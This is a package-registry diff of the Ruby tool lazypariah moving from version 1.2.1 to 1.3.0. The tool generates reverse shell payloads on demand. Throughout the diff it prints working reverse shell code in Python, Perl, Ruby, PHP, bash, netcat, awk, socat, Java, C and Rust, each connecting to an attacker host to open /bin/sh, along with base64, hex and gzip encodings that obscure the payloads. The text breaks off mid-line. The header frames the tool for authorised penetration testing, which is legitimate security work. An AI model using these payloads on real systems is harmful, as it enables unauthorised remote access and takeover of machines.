lazypariah 1.2.1 → 1.3.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/bin/lazypariah +170 -81
- metadata +2 -2
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: e56943a8844277739dcb5295fc717735adfbc10fe1408f37966e96cb0c8e3d7f
|
|
4
|
+
data.tar.gz: 97641d710be3eef0aa977131778df5a89266cd012dcb5b608b19369ff59e74cf
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 305bb9f92a1084f7dab85fcd0cea48d95540b885554d4b773ba455b4d672c44b73f2b89d3a8b7f5243ce43ba69adafbebcd18e64ed9fc6118fe6b6ecae0bf5f7
|
|
7
|
+
data.tar.gz: b4dceeef707c2100d8ef2bf36eecebe35cce7300d565c1fada02eec78057e2d2d793784cf7c143a885089ac42ddcdec59eb151c3b6f9ea85991339ec78787bfe
|
data/bin/lazypariah
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
#!/usr/bin/env ruby
|
|
2
2
|
#
|
|
3
3
|
# Title: LAZYPARIAH
|
|
4
|
-
# Version: 1.
|
|
4
|
+
# Version: 1.3.0
|
|
5
5
|
# Description:
|
|
6
6
|
# LAZYPARIAH is a simple tool for generating various reverse shell payloads
|
|
7
7
|
# on the fly. It is intended to be used only in authorised circumstances by
|
|
@@ -29,7 +29,7 @@ require "stringio"
|
|
|
29
29
|
|
|
30
30
|
# Define constants.
|
|
31
31
|
PROGRAM_NAME = "LAZYPARIAH".freeze()
|
|
32
|
-
PROGRAM_VERSION = "1.
|
|
32
|
+
PROGRAM_VERSION = "1.3.0".freeze()
|
|
33
33
|
EXECUTABLE_NAME = "lazypariah".freeze()
|
|
34
34
|
|
|
35
35
|
# Define payload list.
|
|
@@ -56,21 +56,9 @@ PAYLOAD_LIST = [
|
|
|
56
56
|
"bash_tcp",
|
|
57
57
|
"awk",
|
|
58
58
|
"socat",
|
|
59
|
-
"
|
|
60
|
-
"java_class_b64",
|
|
61
|
-
"java_class_gzip_b64",
|
|
59
|
+
"java_class",
|
|
62
60
|
"c_binary",
|
|
63
|
-
"c_binary_b64",
|
|
64
|
-
"c_binary_hex",
|
|
65
|
-
"c_binary_gzip",
|
|
66
|
-
"c_binary_gzip_b64",
|
|
67
|
-
"c_binary_gzip_hex",
|
|
68
61
|
"rust_binary",
|
|
69
|
-
"rust_binary_gzip",
|
|
70
|
-
"rust_binary_b64",
|
|
71
|
-
"rust_binary_gzip_b64",
|
|
72
|
-
"rust_binary_hex",
|
|
73
|
-
"rust_binary_gzip_hex",
|
|
74
62
|
].sort()
|
|
75
63
|
|
|
76
64
|
# Define dictionary of payload aliases for backwards compatibility with versions < 1.0.0.
|
|
@@ -92,7 +80,20 @@ PAYLOAD_BC_DICT = {
|
|
|
92
80
|
"python3_b64"=>{"payload"=>"python_b64", "pv"=>"3"},
|
|
93
81
|
"python2_b64"=>{"payload"=>"python_b64", "pv"=>"2"},
|
|
94
82
|
"python3_hex"=>{"payload"=>"python_hex", "pv"=>"3"},
|
|
95
|
-
"python2_hex"=>{"payload"=>"python_hex", "pv"=>"2"}
|
|
83
|
+
"python2_hex"=>{"payload"=>"python_hex", "pv"=>"2"},
|
|
84
|
+
"c_binary_b64"=>{"payload"=>"c_binary", "b64"=>true},
|
|
85
|
+
"c_binary_hex"=>{"payload"=>"c_binary", "hex"=>true},
|
|
86
|
+
"c_binary_gzip"=>{"payload"=>"c_binary", "gzip"=>true},
|
|
87
|
+
"c_binary_gzip_b64"=>{"payload"=>"c_binary", "gzip_b64"=>true},
|
|
88
|
+
"c_binary_gzip_hex"=>{"payload"=>"c_binary", "gzip_hex"=>true},
|
|
89
|
+
"rust_binary_b64"=>{"payload"=>"rust_binary", "b64"=>true},
|
|
90
|
+
"rust_binary_hex"=>{"payload"=>"rust_binary", "hex"=>true},
|
|
91
|
+
"rust_binary_gzip"=>{"payload"=>"rust_binary", "gzip"=>true},
|
|
92
|
+
"rust_binary_gzip_b64"=>{"payload"=>"rust_binary", "gzip_b64"=>true},
|
|
93
|
+
"rust_binary_gzip_hex"=>{"payload"=>"rust_binary", "gzip_hex"=>true},
|
|
94
|
+
"java_class_binary"=>{"payload"=>"java_class"},
|
|
95
|
+
"java_class_b64"=>{"payload"=>"java_class", "b64"=>true},
|
|
96
|
+
"java_class_gzip_b64"=>{"payload"=>"java_class", "gzip_b64"=>true}
|
|
96
97
|
}
|
|
97
98
|
|
|
98
99
|
# Define function for displaying program information.
|
|
@@ -108,8 +109,8 @@ end
|
|
|
108
109
|
option_parser = OptionParser.new do |options|
|
|
109
110
|
options.banner = "\nUsage:\t#{EXECUTABLE_NAME} [OPTIONS] <PAYLOAD TYPE> <ATTACKER HOST> <ATTACKER PORT>\n"
|
|
110
111
|
options.banner << "Note:\t<ATTACKER HOST> may be an IPv4 address, IPv6 address or hostname.\n\n"
|
|
111
|
-
options.banner << "Example:\tlazypariah -u
|
|
112
|
-
options.banner << "Example:\tlazypariah
|
|
112
|
+
options.banner << "Example:\tlazypariah -u python_b64 10.10.14.4 1555\n"
|
|
113
|
+
options.banner << "Example:\tlazypariah python_c malicious.local 1337\n\n"
|
|
113
114
|
options.banner << "Valid Payloads:\n"
|
|
114
115
|
PAYLOAD_LIST.each do |p|
|
|
115
116
|
options.banner << "#{" "*4}#{p}\n"
|
|
@@ -121,7 +122,12 @@ option_parser = OptionParser.new do |options|
|
|
|
121
122
|
options.on("-v", "--version", "Display version information and exit.")
|
|
122
123
|
options.on("-D INTEGER", "--fd INTEGER", "Specify the file descriptor used by the target for TCP. Required for certain payloads.")
|
|
123
124
|
options.on("-P INTEGER", "--pv INTEGER", "Specify Python version for payload. Must be either 2 or 3. By default, no version is specified.")
|
|
124
|
-
options.on("-N", "--no-new-line", "Do not append a new-line character to the end of the payload
|
|
125
|
+
options.on("-N", "--no-new-line", TrueClass, "Do not append a new-line character to the end of the payload.")
|
|
126
|
+
options.on("--b64", "Encode a c_binary, rust_binary or java_class payload in base-64.")
|
|
127
|
+
options.on("--hex", "Encode a c_binary, rust_binary or java_class payload in hexadecimal.")
|
|
128
|
+
options.on("--gzip", "Compress a c_binary, rust_binary or java_class payload using zlib.")
|
|
129
|
+
options.on("--gzip_b64", "Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in base-64.")
|
|
130
|
+
options.on("--gzip_hex", "Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in hexadecimal.\n\n")
|
|
125
131
|
end
|
|
126
132
|
|
|
127
133
|
# Define port_check method for strings.
|
|
@@ -132,14 +138,14 @@ class String
|
|
|
132
138
|
end
|
|
133
139
|
|
|
134
140
|
# Define print_output.
|
|
135
|
-
def print_output(s, url_encode
|
|
141
|
+
def print_output(s: "", url_encode: false, new_line: true)
|
|
136
142
|
if url_encode
|
|
137
143
|
print(ERB::Util.url_encode(s))
|
|
138
144
|
else
|
|
139
145
|
print(s)
|
|
140
146
|
end
|
|
141
147
|
if new_line
|
|
142
|
-
puts()
|
|
148
|
+
puts("\n")
|
|
143
149
|
end
|
|
144
150
|
end
|
|
145
151
|
|
|
@@ -199,77 +205,124 @@ begin
|
|
|
199
205
|
exit()
|
|
200
206
|
end
|
|
201
207
|
|
|
208
|
+
# Parse encoding/compression command-line arguments for binary payloads.
|
|
209
|
+
b64_payload = arguments[:"b64"]
|
|
210
|
+
hex_payload = arguments[:"hex"]
|
|
211
|
+
gzip_payload = arguments[:"gzip"]
|
|
212
|
+
gzip_b64_payload = arguments[:"gzip_b64"]
|
|
213
|
+
gzip_hex_payload = arguments[:"gzip_hex"]
|
|
214
|
+
|
|
215
|
+
# Ensure that only one encoding/compression command-line argument can be used for binary payloads.
|
|
216
|
+
bin_cla_counter = 0
|
|
217
|
+
bin_cla_array = [b64_payload, hex_payload, gzip_payload, gzip_b64_payload, gzip_hex_payload]
|
|
218
|
+
bin_cla_array.each do |a|
|
|
219
|
+
bin_cla_counter += a ? 1 : 0
|
|
220
|
+
end
|
|
221
|
+
if bin_cla_counter > 1
|
|
222
|
+
puts("More than one encoding/compression-related command-line argument was entered. This error arises when e.g. --b64 and --gzip are both used together as separate command-line arguments. If you would like to use zlib to compress a binary payload such as c_binary or java_class and encode the result in base-64, use --gzip_b64. Only one encoding/compression-related command-line argument may be used.")
|
|
223
|
+
exit()
|
|
224
|
+
end
|
|
225
|
+
|
|
202
226
|
# Parse payload, applying aliases for backwards compatibility with versions < 1.0.0.
|
|
203
227
|
if PAYLOAD_BC_DICT.include?(ARGV[0])
|
|
204
228
|
bc_dict = PAYLOAD_BC_DICT[ARGV[0]]
|
|
205
229
|
selected_payload = bc_dict["payload"]
|
|
206
230
|
tcp_fd = bc_dict["fd"]
|
|
207
231
|
python_version = bc_dict["pv"]
|
|
232
|
+
b64_payload = bc_dict["b64"]
|
|
233
|
+
hex_payload = bc_dict["hex"]
|
|
234
|
+
gzip_payload = bc_dict["gzip"]
|
|
235
|
+
gzip_b64_payload = bc_dict["gzip_b64"]
|
|
236
|
+
gzip_hex_payload = bc_dict["gzip_hex"]
|
|
208
237
|
else
|
|
209
238
|
selected_payload = ARGV[0]
|
|
210
239
|
end
|
|
211
240
|
|
|
212
241
|
case selected_payload
|
|
213
242
|
when "python"
|
|
214
|
-
|
|
243
|
+
# Python reverse shell.
|
|
244
|
+
print_output(s: "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
215
245
|
when "python_c"
|
|
216
|
-
|
|
246
|
+
# Python reverse shell (intended to be run as a command from a shell session).
|
|
247
|
+
print_output(s: "python#{python_version} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
217
248
|
when "python_b64"
|
|
249
|
+
# Base-64-encoded Python reverse shell (intended to be run as a command from a shell session).
|
|
218
250
|
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
219
|
-
print_output("echo #{code} | base64 -d | python#{python_version}", url_encode
|
|
251
|
+
print_output(s: "echo #{code} | base64 -d | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
220
252
|
when "python_hex"
|
|
253
|
+
# Hex-encoded Python reverse shell (intended to be run as a command from a shell session).
|
|
221
254
|
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
222
|
-
print_output("echo #{code} | xxd -p -r - | python#{python_version}", url_encode
|
|
255
|
+
print_output(s: "echo #{code} | xxd -p -r - | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
223
256
|
when "php_system_python_b64"
|
|
257
|
+
# Hybrid shell: python_b64 payload contained within a system function in a miniature PHP script.
|
|
224
258
|
python_code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
225
|
-
print_output("<?php system(\"echo #{python_code} | base64 -d | python#{python_version}\"); ?>", url_encode
|
|
259
|
+
print_output(s: "<?php system(\"echo #{python_code} | base64 -d | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
226
260
|
when "php_system_python_hex"
|
|
261
|
+
# Hybrid shell: python_hex payload contained within a system function in a miniature PHP script.
|
|
227
262
|
python_code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
228
|
-
print_output("<?php system(\"echo #{python_code} | xxd -p -r - | python#{python_version}\"); ?>", url_encode
|
|
263
|
+
print_output(s: "<?php system(\"echo #{python_code} | xxd -p -r - | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
229
264
|
when "nc"
|
|
230
|
-
|
|
265
|
+
# Netcat reverse shell.
|
|
266
|
+
print_output(s: "nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
231
267
|
when "nc_pipe"
|
|
232
|
-
|
|
268
|
+
# Alternative netcat reverse shell (using a pipe).
|
|
269
|
+
print_output(s: "/bin/sh | nc #{ARGV[1]} #{ARGV[2]}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
233
270
|
when "php_fd", "php_fd_c", "php_fd_tags"
|
|
271
|
+
# PHP reverse shells targeting a particular file descriptor (FD).
|
|
234
272
|
if not tcp_fd
|
|
235
273
|
puts("The payload you have selected requires a file descriptor to be specified. Please specify the file descriptor used by the target for TCP via the command-line argument \"-D NUMBER\" or \"--fd NUMBER\".")
|
|
236
274
|
else
|
|
237
275
|
case selected_payload
|
|
238
276
|
when "php_fd"
|
|
239
|
-
|
|
277
|
+
# Basic PHP reverse shell (without PHP tags).
|
|
278
|
+
print_output(s: "$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
240
279
|
when "php_fd_c"
|
|
241
|
-
|
|
280
|
+
# Basic PHP reverse shell (intended to be run as a command from a shell session).
|
|
281
|
+
print_output(s: "php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
242
282
|
when "php_fd_tags"
|
|
243
|
-
|
|
283
|
+
# Basic PHP reverse shell (with PHP tags).
|
|
284
|
+
print_output(s: "<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
244
285
|
end
|
|
245
286
|
end
|
|
246
287
|
when "perl"
|
|
247
|
-
|
|
288
|
+
# Perl reverse shell.
|
|
289
|
+
print_output(s: "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
248
290
|
when "perl_c"
|
|
249
|
-
|
|
291
|
+
# Perl reverse shell (intended to be run as a command from a shell session).
|
|
292
|
+
print_output(s: "perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
250
293
|
when "perl_b64"
|
|
294
|
+
# Base-64-encoded Perl reverse shell (intended to be run as a command from a shell session).
|
|
251
295
|
code = Base64.strict_encode64("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};")
|
|
252
|
-
print_output("echo #{code} | base64 -d | perl", url_encode
|
|
296
|
+
print_output(s: "echo #{code} | base64 -d | perl", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
253
297
|
when "perl_hex"
|
|
298
|
+
# Hex-encoded Perl reverse shell (intended to be run as a command from a shell session).
|
|
254
299
|
code = "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};".unpack("H*")[0]
|
|
255
|
-
print_output("echo #{code} | xxd -p -r - | perl", url_encode
|
|
300
|
+
print_output(s: "echo #{code} | xxd -p -r - | perl", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
256
301
|
when "ruby"
|
|
257
|
-
|
|
302
|
+
# Ruby reverse shell.
|
|
303
|
+
print_output(s: "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
258
304
|
when "ruby_c"
|
|
259
|
-
|
|
305
|
+
# Ruby reverse shell (intended to be run as a command from a shell session).
|
|
306
|
+
print_output(s: "ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
260
307
|
when "ruby_b64"
|
|
308
|
+
# Base-64-encoded Ruby reverse shell (intended to be run as a command from a shell session).
|
|
261
309
|
code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
|
|
262
|
-
print_output("echo #{code} | base64 -d | ruby", url_encode
|
|
310
|
+
print_output(s: "echo #{code} | base64 -d | ruby", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
263
311
|
when "ruby_hex"
|
|
312
|
+
# Hex-encoded Ruby reverse shell (intended to be run as a command from a shell session).
|
|
264
313
|
code = "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end".unpack("H*")[0]
|
|
265
|
-
print_output("echo #{code} | xxd -p -r - | ruby", url_encode
|
|
314
|
+
print_output(s: "echo #{code} | xxd -p -r - | ruby", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
266
315
|
when "bash_tcp"
|
|
267
|
-
|
|
316
|
+
# Bash reverse shell.
|
|
317
|
+
print_output(s: "bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
268
318
|
when "awk"
|
|
269
|
-
|
|
319
|
+
# Awk reverse shell.
|
|
320
|
+
print_output(s: "awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
270
321
|
when "socat"
|
|
271
|
-
|
|
272
|
-
|
|
322
|
+
# Socat reverse shell.
|
|
323
|
+
print_output(s: "socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
324
|
+
when "java_class"
|
|
325
|
+
# Java class reverse shells (compiled on the fly).
|
|
273
326
|
code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
|
|
274
327
|
|
|
275
328
|
temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
|
|
@@ -279,13 +332,24 @@ begin
|
|
|
279
332
|
|
|
280
333
|
File.open(temp_dir+"/rs.class", "r") do |f|
|
|
281
334
|
java_payload = f.read()
|
|
282
|
-
|
|
283
|
-
when "java_class_binary"
|
|
284
|
-
print_output(java_payload, new_line=false)
|
|
285
|
-
when "java_class_b64"
|
|
335
|
+
if b64_payload
|
|
286
336
|
java_payload_b64 = Base64.strict_encode64(java_payload)
|
|
287
|
-
print_output(java_payload_b64, url_encode
|
|
288
|
-
|
|
337
|
+
print_output(s: java_payload_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
338
|
+
elsif hex_payload
|
|
339
|
+
# Hex-encoded java_class payload.
|
|
340
|
+
java_payload_hex = java_payload.unpack("H*")[0]
|
|
341
|
+
print_output(s: java_payload_hex, new_line: !arguments[:"no-new-line"])
|
|
342
|
+
elsif gzip_payload
|
|
343
|
+
# Zlib-compressed java_class payload.
|
|
344
|
+
sio = StringIO.new()
|
|
345
|
+
sio.binmode()
|
|
346
|
+
gz = Zlib::GzipWriter.new(sio)
|
|
347
|
+
gz.write(java_payload)
|
|
348
|
+
gz.close()
|
|
349
|
+
java_payload_gzip = sio.string
|
|
350
|
+
print_output(s: java_payload_gzip, new_line: false)
|
|
351
|
+
elsif gzip_b64_payload
|
|
352
|
+
# Zlib-compressed and base-64-encoded java_class payload.
|
|
289
353
|
sio = StringIO.new()
|
|
290
354
|
sio.binmode()
|
|
291
355
|
gz = Zlib::GzipWriter.new(sio)
|
|
@@ -293,12 +357,26 @@ begin
|
|
|
293
357
|
gz.close()
|
|
294
358
|
java_payload_gzip = sio.string
|
|
295
359
|
java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
|
|
296
|
-
print_output(java_payload_gzip_b64, url_encode
|
|
360
|
+
print_output(s: java_payload_gzip_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
361
|
+
elsif gzip_hex_payload
|
|
362
|
+
# Zlib-compressed and hex-encoded java_class payload.
|
|
363
|
+
sio = StringIO.new()
|
|
364
|
+
sio.binmode()
|
|
365
|
+
gz = Zlib::GzipWriter.new(sio)
|
|
366
|
+
gz.write(java_payload)
|
|
367
|
+
gz.close()
|
|
368
|
+
java_payload_gzip = sio.string
|
|
369
|
+
java_payload_gzip_hex = java_payload_gzip.unpack("H*")[0]
|
|
370
|
+
print_output(s: java_payload_gzip_hex, new_line: !arguments[:"no-new-line"])
|
|
371
|
+
else
|
|
372
|
+
# Standard java_class payload.
|
|
373
|
+
print_output(s: java_payload, new_line: false)
|
|
297
374
|
end
|
|
298
375
|
end
|
|
299
376
|
|
|
300
377
|
system("rm -r #{temp_dir}")
|
|
301
|
-
when "c_binary"
|
|
378
|
+
when "c_binary"
|
|
379
|
+
# C binary reverse shells (compiled on the fly).
|
|
302
380
|
code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
|
|
303
381
|
|
|
304
382
|
temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
|
|
@@ -308,24 +386,25 @@ begin
|
|
|
308
386
|
|
|
309
387
|
File.open(temp_dir+"/rs", "r") do |f|
|
|
310
388
|
binary_payload = f.read()
|
|
311
|
-
|
|
312
|
-
|
|
313
|
-
print_output(binary_payload, new_line=false)
|
|
314
|
-
when "c_binary_b64"
|
|
389
|
+
if b64_payload
|
|
390
|
+
# Base-64-encoded c_binary payload.
|
|
315
391
|
binary_payload_b64 = Base64.strict_encode64(binary_payload)
|
|
316
|
-
print_output(binary_payload_b64, url_encode
|
|
317
|
-
|
|
392
|
+
print_output(s: binary_payload_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
393
|
+
elsif hex_payload
|
|
394
|
+
# Hex-encoded c_binary payload.
|
|
318
395
|
binary_payload_hex = binary_payload.unpack("H*")[0]
|
|
319
|
-
print_output(binary_payload_hex, new_line
|
|
320
|
-
|
|
396
|
+
print_output(s: binary_payload_hex, new_line: !arguments[:"no-new-line"])
|
|
397
|
+
elsif gzip_payload
|
|
398
|
+
# Zlib-compressed c_binary payload.
|
|
321
399
|
sio = StringIO.new()
|
|
322
400
|
sio.binmode()
|
|
323
401
|
gz = Zlib::GzipWriter.new(sio)
|
|
324
402
|
gz.write(binary_payload)
|
|
325
403
|
gz.close()
|
|
326
404
|
binary_payload_gzip = sio.string
|
|
327
|
-
print_output(binary_payload_gzip, new_line
|
|
328
|
-
|
|
405
|
+
print_output(s: binary_payload_gzip, new_line: false)
|
|
406
|
+
elsif gzip_b64_payload
|
|
407
|
+
# Zlib-compressed and base-64-encoded c_binary payload.
|
|
329
408
|
sio = StringIO.new()
|
|
330
409
|
sio.binmode()
|
|
331
410
|
gz = Zlib::GzipWriter.new(sio)
|
|
@@ -333,21 +412,26 @@ begin
|
|
|
333
412
|
gz.close()
|
|
334
413
|
binary_payload_gzip = sio.string
|
|
335
414
|
binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
|
|
336
|
-
print_output(binary_payload_gzip_b64, url_encode
|
|
337
|
-
|
|
415
|
+
print_output(s: binary_payload_gzip_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
416
|
+
elsif gzip_hex_payload
|
|
417
|
+
# Zlib-compressed and hex-encoded c_binary payload.
|
|
338
418
|
sio = StringIO.new()
|
|
339
419
|
sio.binmode()
|
|
340
420
|
gz = Zlib::GzipWriter.new(sio)
|
|
341
|
-
gz.write(binary_payload
|
|
421
|
+
gz.write(binary_payload)
|
|
342
422
|
gz.close()
|
|
343
423
|
binary_payload_gzip = sio.string
|
|
344
424
|
binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
|
|
345
|
-
print_output(binary_payload_gzip_hex)
|
|
425
|
+
print_output(s: binary_payload_gzip_hex, new_line: !arguments[:"no-new-line"])
|
|
426
|
+
else
|
|
427
|
+
# Standard c_binary payload.
|
|
428
|
+
print_output(s: binary_payload, new_line: false)
|
|
346
429
|
end
|
|
347
430
|
end
|
|
348
431
|
|
|
349
432
|
system("rm -r #{temp_dir}")
|
|
350
|
-
when "rust_binary"
|
|
433
|
+
when "rust_binary"
|
|
434
|
+
# Rust binary reverse shells (compiled on the fly).
|
|
351
435
|
code = "use std::net::TcpStream;use std::os::unix::io::{AsRawFd, FromRawFd};use std::process::{Command, Stdio};fn main() {let lhost: &str = \"#{ARGV[1]}\";let lport: &str = \"#{ARGV[2]}\";let tcp_stream = TcpStream::connect(format!(\"{}:{}\", lhost, lport)).unwrap();let fd = tcp_stream.as_raw_fd();Command::new(\"/bin/sh\").arg(\"-i\").stdin(unsafe {Stdio::from_raw_fd(fd)}).stdout(unsafe {Stdio::from_raw_fd(fd)}).stderr(unsafe {Stdio::from_raw_fd(fd)}).spawn().unwrap().wait().unwrap();}"
|
|
352
436
|
|
|
353
437
|
temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
|
|
@@ -357,24 +441,25 @@ begin
|
|
|
357
441
|
|
|
358
442
|
File.open(temp_dir+"/rs", "r") do |f|
|
|
359
443
|
binary_payload = f.read()
|
|
360
|
-
|
|
361
|
-
|
|
362
|
-
print_output(binary_payload, new_line=false)
|
|
363
|
-
when "rust_binary_b64"
|
|
444
|
+
if b64_payload
|
|
445
|
+
# Base-64-encoded rust_binary payload.
|
|
364
446
|
binary_payload_b64 = Base64.strict_encode64(binary_payload)
|
|
365
|
-
